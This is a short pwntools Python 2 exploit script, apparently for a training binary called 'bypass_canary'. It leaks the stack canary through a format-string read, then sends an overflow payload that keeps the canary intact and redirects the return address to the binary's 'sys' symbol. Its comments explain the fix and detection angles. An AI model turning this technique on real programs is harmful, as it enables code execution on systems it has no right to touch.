from pwn import *
# pwntools session setup (Python 2 syntax: note the `print` statement below).
# 'debug' echoes every byte sent to / received from the target on stderr,
# which is what makes the leaked value and the crafted payload auditable.
context.log_level = 'debug'
# Terminal used by pwntools for gdb.attach(); not exercised anywhere in this script.
context.terminal = ['terminator', '-e']

# Parse the binary's symbol table (used only for elf.sym["sys"] below) and
# launch it as a child process that we talk to over stdin/stdout.
elf=ELF("./bypass_canary")
p = process('./bypass_canary')

# Stage 1: information leak.
# The program appears to pass the "message" straight to a printf-style call:
# '%25$lx' is a positional format directive that prints the 25th variadic
# argument as hex.  On this binary that slot is the stack canary.  Security
# lesson: a canary is a secret; any read primitive (here, user-controlled
# format string) turns it into a known value and nullifies the protection.
# The fix on the defender's side is to never pass untrusted data as the
# format string (printf("%s", msg), plus -Wformat-security / fortify builds).
payload = '%25$lx'                                             
p.recvuntil("message:\n")
p.sendline(payload)                                            

# The line the program prints back is the hex canary followed by '\n'.
# int() tolerates surrounding whitespace, so the trailing newline is harmless.
ret_msg = p.recvuntil('\n')
canary = int(ret_msg,16)                                      
print hex(canary)  

p.recvuntil('payload:')                                        

# Stage 2: stack overflow with the canary written back in place.
# Overwrite the canary slot with the canary's original value; because the
# value is unchanged, the prologue/epilogue check passes.
# Layout (inferred from the payload, not from the binary -- verify in gdb):
#   17 * 8 = 136 bytes of filler to reach the canary slot,
#   p64(canary)    -> the leaked canary, preserved so the check passes,
#   p64(0)         -> presumably the saved frame pointer slot (any value),
#   p64(elf.sym["sys"]) -> saved return address redirected to the binary's
#                         own "sys" symbol (its behaviour is not visible here).
# Detection angle: the stack check itself never fires, so monitoring has to
# rely on the anomalous format-string output or the control-flow change.
payload = 17 * 'AAAAAAAA' +p64(canary)+p64(0) +p64(elf.sym["sys"]) 

p.sendline(payload)                                               

# Hand the tube over to the operator, then close the child process once
# the interactive session ends.
p.interactive()

p.close()